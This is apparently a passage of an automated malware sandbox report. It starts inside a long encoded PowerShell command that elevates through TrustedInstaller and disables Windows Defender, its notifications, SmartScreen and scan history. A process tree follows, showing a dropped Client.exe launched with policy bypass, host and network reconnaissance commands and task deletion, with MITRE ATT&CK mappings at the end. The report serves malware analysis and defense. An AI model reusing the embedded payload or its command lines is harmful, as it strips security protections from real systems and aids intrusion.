gBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2120
    - - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        5⤵
        Launches sc.exe
        
        PID:4596
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        5⤵
        
        PID:2296
    - - C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5068
    - - C:\Windows\system32\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        5⤵
        
        PID:4608
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Client.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Client.exe"'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2528
      - C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3256
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4020
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:3220
    - - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        5⤵
        
        PID:2544
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        5⤵
        Collects information from the system
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
    - - C:\Windows\system32\net.exe
        
        net user
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3800
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        6⤵
        
        PID:4996
    - - C:\Windows\system32\query.exe
        
        query user
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2812
      - C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        6⤵
        
        PID:516
    - - C:\Windows\system32\net.exe
        
        net localgroup
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5080
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        6⤵
        
        PID:804
    - - C:\Windows\system32\net.exe
        
        net localgroup administrators
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:900
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        6⤵
        
        PID:1444
    - - C:\Windows\system32\net.exe
        
        net user guest
        5⤵
        
        PID:4480
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        6⤵
        
        PID:4912
    - - C:\Windows\system32\net.exe
        
        net user administrator
        5⤵
        
        PID:2388
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        6⤵
        
        PID:1412
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        5⤵
        
        PID:2108
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        5⤵
        Enumerates processes with tasklist
        
        PID:3556
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        5⤵
        Gathers network information
        
        PID:5064
    - - C:\Windows\system32\ROUTE.EXE
        
        route print
        5⤵
        
        PID:4600
    - - C:\Windows\system32\ARP.EXE
        
        arp -a
        5⤵
        Network Service Discovery
        
        PID:1016
    - - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        5⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:3296
    - - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        5⤵
        Launches sc.exe
        
        PID:668
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2872
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5032
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows"
      4⤵
      PID:4936
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows"
        5⤵
        
        PID:1220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp40B5.tmp.bat""
      4⤵
      PID:4276
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4632

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:2672
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:4604
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3264
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    PID:4376
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    PID:1232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

T1012

System Information Discovery